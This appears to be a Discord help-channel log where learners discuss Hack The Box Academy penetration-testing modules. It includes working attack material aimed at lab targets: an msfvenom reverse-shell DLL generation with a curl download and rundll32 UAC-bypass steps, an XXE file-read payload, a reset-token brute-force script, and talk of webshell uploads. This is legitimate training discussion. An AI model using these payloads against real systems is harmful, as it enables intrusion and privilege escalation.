#modules
I just reset the machines. Yeah, all 3 ways don't seem to do what they should be doing. Metasploit gets the file uploaded but it doesn't seem to start on the listener, the WAR payload created with msfvenom won't call back, and the webshell uploaded gives a 404 error.
done using wfuzz
OK, I seem to have gotten it now. Used the HackTricks version of the webshell.
try resetting the machine and vpn
hello
I'm in the Shells & Payloads PHP Web Shells section and every time I upload the file using Burpsuite and then navigate to the /images/vendor/connect.php on the site, I get the error of Not Found The requested URL /images/vendor/connect.php was not found on this server. Has anyone else run into this before? I made sure to use Burpsuite to change the file type from application/x-php to image/gif.
so do you need help with something?
First, did the upload succeed? And did you name your web shell connect.php? /images/vendor/ is the upload directory, so your shell should be in there, and if directory listing is enabled you can just see your shell.
Anyone got any good resources for learning assembly? Don’t mind reading books.
hi
try this site https://ost2.fyi
has anyone been able to install and run pypykatz? It gives me errors
and it's not on the pwnbox either
Strong suggestion: don't attempt the AD skills assessments unless you really know the pivoting module work.
Shit wrong channel.
ok I solved the pypykatz issue
Password Attacks/Network Services - I am joining the share, but cannot dir or ls to see what's in the directory... could someone lend me a hint?
as it says access denied
Are you asking for the list of possibilities of why you are denied access?
haha
your pass may be wrong
your user may be wrong
comes to mind at first
Yeah, I thought that too, but crackmap stops when it finds that user...
unless I just remove it from the list
because that is a valid user, so you may want to remove that
ok let me try that then
And the reason for this is that all users are on the same box, but each user shouldn't have access to (I think) almost every service, but still they do.
So that is a valid user, but (hint) just not the right one for SMB.
i see
If that's the case, you can also use the "--continue-on-success" flag so it doesn't stop.
Could someone help me with Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used mut.lists from the resources.
Which service did you try to bruteforce then? Try || winrm ||
Yes I did and I got nothing. I've been resetting the target twice and nothing, unfortunately.
DM
got rickrolled by htb 
hi
I need help in the Metasploit Framework module, section Payloads. I'm using the exploit exploit/linux/http/apache_druid_js_rce, changed rhosts to my target IP and lhost to my IP, but it's not running. I watched a tutorial online and he did nothing different than me, but still obtained a reverse shell. Is there something I'm missing?
ok?
Never mind, I just realized I was using the wrong IP address. Face palm.
ok
Did you configure the SRVPORT to the correct port?
I would like to train IoT cyber security. Any tips for specific modules or even machines?
u guys look like bots, cuz u type like one. Lol
Hi, I'm stuck on FOOTPRINTING LAB - MEDIUM: I enumerated the UDP service and found creds for user alex, I logged into the server using this name and creds via RDP, but I found creds for user sa. I tried to log into the MSSQL Server Management Studio app, but I receive an error. I tried logging into the SMB service using username alex and creds and found sa creds. What should I try next?
Your user has no rights to access the database.
You have to log in with another Windows user (password you already have) via RDP on the client.
Thanks for the help, I'm gonna try.
yep try that with ffuf
Yes, this is for discussion about modules in the academy.
Unfortunately, we do not have a crystal ball and cannot see into the future. So if you tell us what you need help with, I'm sure you'll get some help. 😉
ok
yes
That's academy
not enterprise 🤷♂️
Idk where to talk about enterprise
Hello guys need a nudge on "BROKEN AUTHENTICATION-Brute Forcing Cookies"
best bet is to reach out to support pload
In the Skills assessment of pivoting and tunneling, what am I expected to do for question 5? Load kiwi or something like that?
but could be DNS as always..
DNS strikes again, I just moved on in the module. I'll check back when I'm done.
Like loads of things are fucky
All the tables are whack
Wouldn't expect this for how much you pay for enterprise 
HTB cashgrab moment
Hi all,
I'm in the Attacking Common Services module, Attacking Common Services - Hard section. ||I have managed to login with SMB and get access to the IT folder with the three users and their .txt files. Then using the creds.txt file to login to the MSSQL service and via RDP as user fiona. I also managed to find the two users I can impersonate by logging into the MSSQL database. Problem is that neither john nor simon gives me admin privileges, which is very confusing considering the hint in question 3.|| Can I get a hint on how to proceed? 🙏
dunno, on the normal academy it loads just fine
Gm guys, still stuck on the 4th question as I was yesterday. I'm in "INTRODUCTION TO WINDOWS COMMAND LINE"; Section "Skills assessment" question 4: "User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."
I have cd'd into one of the dirs; all the other dirs have the same flag.txt, but I'm not sure which one to open and it feels kinda overkill to cd into each and every one to find the right flag, since there are multiple dirs with the same '0 flag.txt'.
And it seems there is no ASCII text in any of those I try to look at, since there is "0 bytes" in the files.
I haven't done the module, but did they cover the 'tree' command?
Yes they did, I tried the tree command but it just spits out too much information that it seems overwhelming.
Lemme get a sc on that
Need to scroll for like 5-7 seconds to get to the bottom
That is how big the folders are in \Documents
Ah yeah, it looks like it's intentionally set up, to make you use tree.
As mentioned before, every dir has another dir that has another dir
that has flag.txt
This is from the top, you need to scroll a bit to get to the bottom
I have tried PowerShell commands, Get-Content or Get-ChildItem; I even looked into the hive and it spewed out the same information.
gci, no I do not think so...
the module is so big
With Get-Content I had permission denied; I even tried an elevated PowerShell but I had permission denied.
they did cover sls but I'm not sure what string to search for...
I even tried that
I have tried every command I can think of in CMD or PowerShell.
I'd look to see if there's any section that covered Get-ChildItem (gci), which then was able to look at length.
Alright, I'll check into it.
check the sections again
Is there a command where I can read all the files within a dir?
Can you be a little more specific? I feel like I've read everything
anyone?
the hint might feel confusing but it is actually a really good hint
the other hint might move forward
dont go back
step by step every door opens a new one
Ok, but can you at least tell me if I'm on the right track with MSSQL?
not sure, be specific
what do you mean?
have you found the answer to the question 3?
Yes, ||It's John||, but does not provide admin privilege...
Like the question suggests
I am telling you to move forward. Think about what might be the reason you have access to mssql
||```
┌──(kali㉿kali)-[~/HTB/AttackingCommonServices]
└─$ sqsh -S 10.129.203.10 -U .\fiona -P '48Ns72!bns74@S84NNNSl' -h
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> USE master
2> go
1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go
john
0
1> EXECUTE AS LOGIN = 'simon'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go
simon
0
```||
Ok, I will forget MSSQL for now and try something else... Thanks
You can also use the SQL Server Management Studio on the target.
Guys any hint on "BROKEN AUTHENTICATION-Brute Forcing Cookies" - this module drives me to despair!
Read the Hint
|| This web server doesn't trust your IP! ||
Where exactly are you stuck?
Tried that too, but I get a connection issue...
maybe you need to tweak a setting before you can access the instance
Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?
Yes, this question is unfortunate. You have to add the role super in the cookie
Weird question - for the AD enumeration skills assessment 2, when I use crackmapexec smb --users to enumerate all the usernames I get all the various accounts such as INLANEFREIGHT.LOCAL\SX681, INLANEFREIGHT.LOCAL\MC188 etc etc., but when I enumerate with windapsearch (and kerbrute using the jsmith.txt) I get users like cn: Annie Vazquez
userPrincipalName: avazquez@inlanefreight.local
why is this?
I'm using this || /CommonAdminBase64.txt|| wordlist but not sure that I set up my intruder correctly
You don't need a wordlist at all.
Adjust your script so that it recalculates the cookie for you.
|| username: htbuser
role: super
time: unixtime ||
got it dude:)
awesome!
thank you!
and then when I run enum4linux-ng I get a mix of both 😛
username: YL119
name: Jessica Ramsey
acb: '0x00000210'
description: (null)
Why do some tools have the username as YL119 and others have it as jramsey@inlanefreight.local?
Hello, I am currently working on the "Password Attacks" module, but I got stuck on this question: "Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."
I ran crackmapexec and found the supposed user and password ||(john:november)||, but whenever I run evil-winrm I get this error: Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Can anybody help me?
yeah, sometimes evil-winrm is playing games
using web proxies showcases burp and zap
Do you know what else I could use? I tried searching for other tools but I couldn't really find any.
maybe purge and install the tool again?
Hi everyone! Can someone point me in the right direction on the Password Attacks module (Network Services)? The last question: "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." I can log in to the SMB service with the user J**** and his password, but cannot find the flag. The only readable share shown for me is IPC$, and when I do a "dir" on it there is nothing there. (smb: > dir
NT_STATUS_INVALID_INFO_CLASS listing * ) I do not know what I am missing or what I am doing wrong. Thank you
Has someone finished the Active Directory Attacks module? I need help on skills assessment Part II please.
Quick questions on File Upload Assessment
I have found the bypasses and I'm able to use ||XXE to pull information /etc/password and sourcecode etc.|| It reads that I should be able to find the flag in the root directory "/" but when doing so it comes up blank.
I'm sure it's a slight misunderstanding on my part, but would like a small clarification / hint.
Payload: ||<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:////"> ]>
<svg>&xxe;</svg> have also tried /flag.txt /flag etc||
@bronze sequoia can't help but notice you've been spamming a lot of random stuff through quite a lot of channels, do you need help with something?
That is a valid user (not for the SMB question), but still a valid user, so you may want to remove that due to spoilers.
Also, hint: if you got access to the target machine, get all of the users on that machine and use them as a username wordlist. If a user gets a hit on SMB but you get nothing when logging in like this, just remove that user from your wordlist and continue.
sure what's the issue?
I was unable to access it with RDP, but I found it, thanks.
Yep, for this you have to get RCE, so the flag is there, it just isn't named flag.txt.
and hint ||source code||
Oh, was not expecting to have to get RCE lol, let me figure this out, ty for the slight hint.
Thx, I'll try that
Hello guys, I am stuck at https://academy.hackthebox.com/module/75/section/764
Common Web Vulnerabilities
To which of the above categories does public vulnerability 'CVE-2014-6271' belong?
I was searching all over the internet for a description and nothing that I input worked.
So I got stuck here, that is the final question that I didn't answer.
Hi, I'm stuck at https://academy.hackthebox.com/module/80/section/837 question No. 2. I can't get a username and password match. This is my script:
```python
#!/bin/python3
import sys
import requests
import os.path
# define target url, change as needed
url = "http://138.68.164.196:32364/question2/"
# define a fake headers to present ourself as Chromium browser, change if needed
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36",
    "X-Forwarded-For": "127.0.0.1"
}
# define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success
valid = "Welcome"
...SNIP...
```
The python3 part from the example is the right path, but you can just do it in Burp.
Linux Privilege escalation, Special Permissions. Not really sure what the questions are asking for. Little help please.
what's wrong with the script?
no idea
From what I can tell, you only put the part where you set some variables and nothing more.
How would I go about doing it in Burp?
There is no code about sending the request, and for debugging you can just route it through a proxy.
Change the header in the request to the one in the example Python code.
The answer for that question is 1 of the 4 given options in the section.
But then I get rate limited.
I've spent all day working on the Active Directory enumeration skills assessments LOL
I've almost finished the 2nd one
this part isn't about brute forcing
about what then
head hurting, will sleep now
@rustic sage Hi
Hi
Like the question said, one of the methods shown, and the section didn't show any brute forcing.
just bypass method
hmm
The Python code is just changing 2 lines in the header; you can just do that in Burp and get the flag.
I found it, thank you for the little push!
oooooh think I get it
What did I do wrong, lol
For SQL Injection Fundamentals - SQL Operators, I am at a loss why this is not working. I even pulled the entire table and used grep to see if I was wrong and I keep getting ||322||
In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?
||```sql
MariaDB [employees]> SELECT COUNT(*) FROM titles WHERE emp_no > 100000 OR title NOT LIKE '%engineer%';
+----------+
| COUNT(*) |
+----------+
|      322 |
+----------+
1 row in set (0.137 sec)
```||
Spoiler: if you do Offshore, the thing that is going to be hurting isn't going to be your head 🤣
got it... ty
thought I had to brute force
Oh, so that's what the last part of your code is.
The computer will be hurting when I throw it out the window
try without the COUNT thing and replace the ||OR|| with ||AND||
I'm a bit off doing offshore I think 
Okay so I feel like a big dunce, I have found ||upload.php and I see how the files are uploaded and where they are placed, but I'm not understanding how I get RCE from here unless I've just utterly failed on my recon of the bypasses. /uploads/230220_flag is my understanding of accessing the flag upload?||
That's where your payload is uploaded, not the flag. Also, the upload directory is wrong.
The directory is || /user_feedback_submissions/||
Still missing 1 more thing, but that's the right part of it.
|| /user_feedback_submissions/230220_penguins.svg -------based off of penguins.svg original file name||
Really makes me question my ability here 😦
the struggle is real
I had too many zeros
I'm stuck on the hard lab of the module network enumeration with nmap. I believe I know what I'm looking for but honestly I feel completely clueless as the flag isn't presented from that service
"Find the valid username for the web application based at subdirectory /question2/." This question?
yes
1 sec I'll check my notes
is anyone else having issues with host 3 in the shells and payloads live engagement?
What do you do with that?
show me the command
Used Burp Intruder to enumerate the usernames and the other params, but no success.
using the wordlist for top-usernames-short.txt
Feel free to DM - let me know what you know/did already; where you stuck
did you check each response?
yeah ~ "Invalid creds"
Let's try to do it with wfuzz as shown at this part of the module
I bet you will get the flag in 2 minutes 🙂
.
if something goes wrong send me your command and I'll fix your mistakes
Thank you. I missed that I would need to change the name of the shell to connect.php. I should have realized that as that is where I was trying to navigate to.
Because it has JavaScript and deobfuscation in its name, I was scared to start that module until today, and finished it within an hour or so. OMG, the easiest module ever. hahaha
anyone available to help me with the last question on the shells and payloads live engagement?
hlo guys
If you just write it down it would be a lot easier.
heyy
||Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt||
Everything in the hints and enumeration was screaming to use EternalBlue, but when running it I got consistent failures.
can you change my nickname pls
Yeah, that exploit only works like half of the time for me if I'm lucky, but instead of that exploit use the one that only runs 1 command, ||ms17_010_command||, and just get the flag.
I'll try that.
And also, you can confirm exploits like this with an nmap script or scans in Metasploit, and when you confirm the vuln and an exploit doesn't work, then all you'll need to do is find a different one.
Well, I did try the psexec version, but there were no shares available to grab hold of.
I have to reset the machine, just waiting for it.
that worked. thank you. this capstone was a nightmare.
Before you got hold of me I was trying to use Antak and LOLBAS to upload the file to the VM machine, but I couldn't get an upload server going on it. You saved me probably 2 hours of troubleshooting for this one.
Looking up the error, it says "location" should be inside of server, which I think it is? Have also tried putting it in server / etc. Unsure why this isn't working.
```nginx
    worker_connections 1024;
}
http {
    include mime.types;
    default_type application/octet-stream;
    upstream tomcats {
        server <IP>:<PORT>;
        keepalive 10;
    }
    server {
        listen 8080;
        location / {
            ajp_keep_conn on;
            ajp_pass tomcats;
        }
    }
```
Nginx Reverse Proxy & AJP
nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:66
For learning, what's better: Hack The Box or Offensive Security, if we just look at the effectiveness and not the price?
Htb
why and in what aspects?
Can't you do that on other platforms too?
and, objectively, an offsec certificate is an important thing for a job
Then you should go for CEH.
Not on OffSec you can't.
Hmm
ceh can be done after some offsec certificate
I just don't understand if the beginner course is worth 800 bucks or not.
But ceh is basic
Sometimes they run scholarships.
spend $8 a month and see if HTB is the right fit
In Port Forwarding with Windows Netsh of PIVOTING, TUNNELING AND PORT FORWARDING I'm having some issues with the netsh command:
||C:\Users\htb-student>netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.19 The requested operation requires elevation (Run as administrator).||
Usually you can pretty much follow the modules step by step, and nowhere does it mention anything about getting ||Admin rights, so I'm thinking that it's an issue with my command and not a matter of privesc before running netsh.|| Is it a wrong assumption? Thanks
Hi all,
I'm in the Attacking Common Services module, Attacking Common Services - Hard section. ||I have managed to login with SMB and get access to the IT folder with the three users and their .txt files. Then using the creds.txt file to login to the MSSQL service and via RDP as user fiona. I also managed to find the two users I can impersonate by logging into the MSSQL database. Problem is that neither john nor simon gives me admin privileges, which is very confusing considering the hint in question 3.|| What am I missing?
Why copy-paste the same thing again?
Because I still can't figure it out 😦
you already told me you got the answer right for the 3rd question
Yes, I had it right before i posted the first time
But i still don't have any admin rights...
which means you are trying at the wrong place
Is it through rdp then or? I'm also totally lost and my brain is really not functioning anymore xD so could you hint more specific to what service or what part we have to do 😄
Hello, I just joined HTB Academy and I found myself with an issue that my HTB viewer (the web Pwnbox) starts and stops working after some seconds. I tried to find some info about it, but had no success. Sorry if I am posting this in the wrong channel.
Some help at the predictable token reset please I have this script:
||```python
from datetime import datetime
import pytz
now = datetime.now(pytz.timezone('GMT'))
epoch_time = int((now - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
epoch_time_str = str(epoch_time)
print(epoch_time_str)
```||
Which should return the time for variable now in this script:
||```python
#!/usr/bin/python3
from hashlib import md5
import requests
from sys import exit
from time import time
# Change the url to your target / victim
url = "http://134.122.103.40:30363/question1/"
# To have a wide window try to bruteforce starting from 1050 seconds ago till 1050 seconds after.
# Change now and username variables as needed. IMPORTANT! the value for now has to be epoch time
# stamp in milliseconds, example 1654627487000 and not epoch timestamp, example 1654627487.
now = 1676900794812
start_time = now - 1050
end_time = now + 1050
fail_text = "Wrong token"
username = "htbadmin"
# loop from start_time to now. + 1 is needed because of how range() works
for x in range(start_time, end_time + 1):
    # get token md5
    timestamp = str(x)
    md5_token = md5((username+timestamp).encode()).hexdigest()
    data = {
        "submit": "check",
        "token": md5_token
    }
    print("checking {} {}".format(str(x), md5_token))
    # send the request
    res = requests.post(url, data=data)
    # response text check
    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
```||
But I can't get it to work, any help please?
I'm aware thanks, would you be kind enough to give a useful hint? We are hard stuck here
Tried skimming the sections again like you said earlier... nothing 😦
You've got too many hints; the next thing is the answer.
Maybe you should leave it for a couple of days and start with a fresh mind.
You are missing a very obvious thing.
Honestly I think you are better off building your own VM using either Kali or ParrotOS. The provided Pwnbox is missing some tools anyway. You can install tools on it, but they will get wiped away when you reset the Pwnbox. I only use it if all else fails or if I need to check something really quick
also, if what is start/stopping is the VPN, you can have only one VPN connection active at any one time
I think there is a pwnbox channel if you want to go into specifics of the provided pwnbox
From no experience in IT, I have learned a shit ton from HTB. I like how they build on the basics, and incorporate stuff as you progress through the paths. The hands-on portion is EXTREMELY important for me because I learn by hands on so reading the material then doing helps you better understand it.
Run the command part on your local terminal first to verify that it works.. your last payload does not make sense
Hi, I'm stuck once again at the Broken Authentication module (https://academy.hackthebox.com/module/80/section/767) question 2. I found the params in the request but really don't know what to do with them. Could anyone give me a hint what to do with the params
Hello, new to web pen-testing and was stuck on Web Proxies encoding/decoding using Burp Suite. VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0= Trying to understand how to accomplish this within Burp Suite Decoder. I have tried several methods with no luck.
Which encoding do you think it is?
Base 64
Can you not simply select base64 then in burp decoder?
Yes, but there is a flag within it that I am trying to decode: "The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag."
You have to add additional decoders after the base64 decoding - I remember that was a pain in ZAP, but does Burp not allow you several steps?
You have to try all user names from the wordlist and pay close attention to the response. One will be different
Yes it does, that's where I am stuck; tried a few combos but have not found that combo.
Try to understand the different formats, you'll find the combo then. It's about patience and understanding what the different formats look like
ok thanks
I think it's mainly ||base64 and hex|| from what I remember
Is there a way to go through the free machines,
or just open any machine and go on
Hey guys
He isn't even verified or previously asked anything; there is no chance he needs help with modules.
Nope, the rules are at #rules.
but if you need help with something just say that instead of hello
Dude , be nice
I obviously would want to ask something about modules in the modules chat.
Lol well this channel is for help with academy modules. If you have a question, it's much better to state your question instead of typing "hello"
Unless you're genuinely lost in the discord server which is ok. You'll have to verify to see other channels
Thank you so much
How do I get verified?
Send ++verify in the #bot-commands channel
It should send you a DM with instructions
Happy to have people like you in the server
You've been really helpful!!
I try 😄
Hello, May I ask help for Pass the Hash Module? I successfully got David's hash but I tried to use Invoke-TheHash but it says "inlanefreight.htb\david WMI access denied on DC01"
how should I solve this issue?
MRTom is like the nicest person in the chat. It's just literally a daily issue of people coming in here, not reading the rules or how to verify or the like, then instantly treating this chat like it's a general server chat, which it isn't. Popping in here just to say hi kinda mentally puts you in that camp of people.
May I have some assistance/nudge with Password Attacks - Hard Lab I opened the encrypted bitlocker .vhd file. Attempted to utilize secretsdump.py to extract hashes but receive the following error.
try copying out the files first just to be safe
anyone looking for help?
Probably a silly question. Shells & Payloads, The Live Engagement: am I not supposed to tunnel? The host with RDP access does not even have a browser to use.
wmi isn't the only remote access possibility, try some of the others.
Receiving an Input/output error when attempting to copy the SYSTEM file to a directory outside of the mounted directory.
then something's gone wrong with your mounting/decryption
Thank you!!
Nevermind, I slammed enter multiple times and got my chisel tunnel going. Like wtf -.-
lol I was planning on trying that but I just used the RDP. The machine does have Firefox: if you open up a terminal and run firefox as a command, it'll open it.
Hi I'm working on the Documenting and Reporting module and I'm having an issue with the second question: "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him?". I found the answer earlier in the module but I'm struggling to format it correctly. If anyone could help me out a bit that would be great (:
hi
I am already committed with my tunnels. Good practice anyway
That did it. Thank you @thorn urchin !
Let’s keep this channel on topic please
👍
woohooo just finished both skills assessments for AD enumeration
the last few questions were actually the easiest lol
absolutely wild module
Anyone have issues with the Password Attacks module, section Network Services, with the RDP attack? It either gives connection errors, or when it does start, the connection overloads even if setting -t 1.
Did you keepass2john?
I still have some problem that says
😦
Hey! I'm on Password Attacks - Network Services. Can someone help me understand how to obtain the user for the services such as WinRM, RDP, etc.? I understand how to obtain the password, but not getting how to get the single user. Thanks
Hi there! Does someone know what happened to CBBH and CPTS channel. I don’t see them any longer. Is it just me?
OK everyone, why when I run wpscan --url <URL> -e ap does it find 2 plugins, but if I run wpscan --url <URL> --enumerate it doesn't find plugins?
Is anyone having issues installing the latest version of pypykatz??? Install with pip or git clone ain't working for me
need to use for a module, but doing the install instructions on the github isn't working
even installed in a Venv
Like, I can't complete this skills assessment if I can't use this tool haha
create a new pwnbox instance and run #modules message
how long does this password mutation module take? I have been brute forcing the password for a good minute now...used the provided resources.
you get the last 2 for network services?
Of course, I don't skip haha
xD
Don't overthink them... very straightforward
Module: Attacking Common Services
Section: Skills Assessment - Easy
- I've enumerated the services and found the username & password
- I've retrieved and read || the documents in FTP ||
- I've checked || service user privileges in MariaDB and can read/write to host || and I understand my next step is || to upload a php shell to C:\xampp\htdocs || but I am unsure as to how to craft it and how to invoke it .
A nudge or someone to DM would be a huge help
Shorten that damn list lol
that section is horribly long
Also, I think that is the one where you have to bruteforce another service that they don't tell you is there.
Yeah, I have two going at once... I'll try shortening it haha
Feel like I'm losing knowledge, it's so long haha
that section is dumb af
Check the length of your mutated list with 'wc -l <mutated-password-list>'; it should be around ~90k. I messed up my mutation and ended up with 180k lines.
Hint || check other discord advice but you can generally cut the first 17k lines with "sed '1, 17000d' file.txt > new_file.txt" and get a quick result ||
Interesting... thanks! Yeah, my list is 187K.
That's exactly what I did, I had to go back and review my mutation process and then got the right amount. good luck!
Hey. Could you help. I have a problem with Linux and VMware
Hey, I'm trying to set up VMware but it says "Before you can run VMware, several modules must be compiled and loaded into the running kernel".
It doesn't run properly. Do you know why?
I don't know why
Okay
Maybe you could ask another person
in theory, setting up an smb server for instance, you can do both
Would you have an answer for me too?
?
I can't fully understand that question, is it during vmware's installation or some virtual machine that you are trying to install?
I'm just trying to start with Hack The Box. I'm running a Linux system but am trying to install VMware.
During installation
Try to paste the error message into Google and see if there are other people that could have experienced that.
I've just installed stuff to /usr/src
Okay. Thank you
Do you know a better way to set up the vpn?
For HackTheBox?
OpenVPN's binaries are usually preinstalled on Ubuntu, Kali and ParrotOS for example, which leaves the opportunity for you to only execute the command and specify the path to the VPN in order to connect
I’m in elementary OS
also, you can download ready-to-go ISOs that you can import into VMware and just boot up the machine
Okay. So is VMware an easy way to do it?
Up to you, there isn't a general easy way, just adapt over what you have
Could you find me a tutorial for doing it in Linux. I can’t find one I’ve been looking for ages?
no, this I will leave to you
i am not able to move between the windows in tmux... i tried prefix + arrow up, arrow left...doesnt work...
i looked into the man pages and there it was described like this...i looked into the example_tmux.conf file but I did not get any wiser...
how should it work...? or in which config file do i have to look?
if you are using pwnbox, it will be a bit hard to do that
no my own...
if you have created separate windows, then you must specify the window number
unless you have splitted them horizontally and/or vertically
thanks, will look at that tutorial. before I watched one from ippsec...he did it also with the prefix + arrow
also this - https://tmuxcheatsheet.com/
thanks ;)! ctrl + b, let ctrl go and then the arrows 😉
ipsec 8:43 😉
Hello and good day everyone.
Please can you guide me on which modules in academy centre around infrastructure security domain and application security domain as the names of modules don't help much. I've seen OWASP top ten but I need a more guided approach to attacking these subjects, thank you.
OWASP Top 10 is a path on the main platform (app.hackthebox.com). This path has nothing to do with the Academy.
The names of the modules in the Academy (academy.hackthebox.com) are actually self-explanatory.
On which platform are you looking for exactly what?
Thank you for your reply sir.
Ohhhh my bad.
I thought I'd seen it on HTB academy.
I'm currently on Academy sir, I'd like to study the aforementioned subjects, if you don't mind can you guide me on the modules I should study and other extra modules that might be helpful?
To be honest, almost every module deals with infrastructure or application security. It's best to go through the modules and mark the ones that interest you with a heart. Then they will appear in your ToDo list.
The titles of the modules clearly indicate what is at stake
Well thank you again for your help.
I'll do as you've said now.
Hey there, i just finished Password Attacks Lab - hard completely on my own attack machine, but i know there were some stuff and a file on the victim host. So if anyone got a solution how i can reach the same using the provided stuff on the victim machine, feel free to DM me. Thanks 🙂
Hello, i have problems spawning an instance,
its showing up and then i get a "black screen" after a few seconds
Where to go with this problem?
Anyone have any issue submitting their answer for Active Directory Enumeration & Attacks - Miscellaneous Misconfigurations question 2?
Identified user through both Kerbrute and PowerView.
Checked against ADUC to confirm Kerberos preauth is not required
User hash grabbed through both GetNPUser.py and Kerbrute
Ran hash through both hashcat and john (same result)
Apparently wrong answer. I get the same hash password as the module example. Anyone else had this issue? I've tried multiple times
I had the same issue, I changed from xfreerdp to rdesktop and it worked
wow without looking at the walkthru in the web attacks part of attacking enterprises i would NEVER have got past the verb tampering plus x-custom-ip-authorization part
I am also having the same issue. Able to get SSH and WINRM but when it comes to RDP and SMB am stuck. I can see the shares on SMB but cannot access. Any help?
Same here. Able to solve SSH and WINRM but got stuck in RDP and SMB. I could see the shares in SMB, but cannot access it any help?
nope
on the sql injection skill assessment (final exercise): Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
||I bypassed auth, identified tables and columns, found that root@localhost has super_priv rights and file permissions on mariadb. I doublechecked that I'm logged in under 'root@localhost'. ||
When I try to write my webshell to the server I still get error 13: permission denied. Even though it seems like I have file permissions? Can someone give me a hint on this exercise?
hey everyone, I just finished the "Cracking Passwords with Hashcat" module and in the last question I had to manually clean the output file to find the most used password ... I would like to know how could this be done using grep (as mentioned in the hint). I tried looking only but didn't find a solution that just read the password occurrences after last colon
why do you need to write a webshell ... you are just trying to read the file only
@iron plaza Cause I dont know what the filename is, so I'd figure I'd get a webshell to figure that out? ls for instance
yea you need to list down the files in the root directory then load the file once you know the name all this through sqli
Thanks! I'll have to figure out how to list the files, but this already helps a lot as I dont have to figure out why i cant write a webshell!
actually ignore what I said ... i am trying to recall how I solved it but I am failing to remember... you may need a webshell to enumerate the directory but probably from an admin panel ... looks like i need to redo this again to jog my memory
nvm I mistyped something 🤣
That's alright, I'll just keep trying, thank you anyways for your help!
doing the attacking enterprise networks, some real brain teasers but happy to report im in..... 
You need to find a directory that you do have permissions to write to.
Maybe reading a file first may help
I am taking the windows CLI exam but when I connect to the ssh it doesn't print the banner to find the next answer.
"The banner will be printed on the banner on successful login to the host via SSH."
file upload attacks is borderline annoying module...
Agreed lmao
I actually found it to be so annoying that I decided to take a break from CPTS (ok it's not entirely that module's fault but that's what put me over the edge). Now I'm learning C# and developing a C2 lmao
Good evening friends! Who will help in the passage of the module Abusing HTTP Misconfigurations. I have a lot of things that do not work, I do everything according to the instructions.
spent the last hour and half going into the rabbithole that the hint gives you, smh
hi guys can anyone guide me with the shells and payload "the live engagement section"?
I am stuck. I upload the war file generated by msfvenom but I don't get a reverse shell
Windows Privilege Escalation
User Account Control
i tried these :
msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f dll > srrstr.dll
transfer
TARGET> curl http://<attacker-ip>:<python3-port>/srrstr.dll -O "C:\Users\<my-account>\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
normal revshell (works)
ATTACKER> nc -lnvp 9999
TARGET> rundll32.exe shell32.dll,Control_RunDLL C:\Users\<my-account>\AppData\Local\Microsoft\WindowsApps\srrstr.dll
elevated revshell (nothing happens, not getting any shell)
ATTACKER> nc -lnvp 9999
TARGET> C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
//ok got it. need to signout & sign back in
Web Proxies - Skills Assessment: I am needing to capture the http response and change some things. I am needing to do this multiple times so I need to send it to the repeater. However when I hit ctrl R it just sends the request and not the response and I am unable to change it in the repeater. Any help?
Actually forgive me I completely forgot about automatic modifications...
Hello, could anybody give me the password for sam from "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer. " from Password Mutations from Password attacks.
The mutated_passwords dictionary has 94000 passwords and I've been running hydra with 64 threads for like 4 hours and it only did 14000
I don't know what else can i do because like this it's taking forever
remove the first ||17000|| password
I have a dream... that the password attacks module will one day get updated, so this doesn't happen 10 times each day.
I am completely stuck on the skill assessment in the shells and payloads module. I have logged in via RDP on the foothold machine from my own Kali VM. This brings me to Parrot desktop. I can see a txt with credentials, but there is no browser installed. How am I supposed to access host1 @ 8080 without a browser? I tried curl but that didn't get me anything.
Firefox
run firefox in a terminal
^
hi even I am stuck with the shell and payload section. Can I message u privately?
sure
tysm finally found it!
anyone available to get me some help/hint for the privesc for windows privilege escalation - skills assessment II? tried windows-exploit-suggester.py(listed a lot of them) and run some exploits that I got from winpeas but none of them did work.. thank you
Thanks.
@vital adder every day I see you grinding hard in here, whether I'm whining about shit I dont understand or feeling amazing cause something clicks. You're here every day and deserve all the praise in the world.
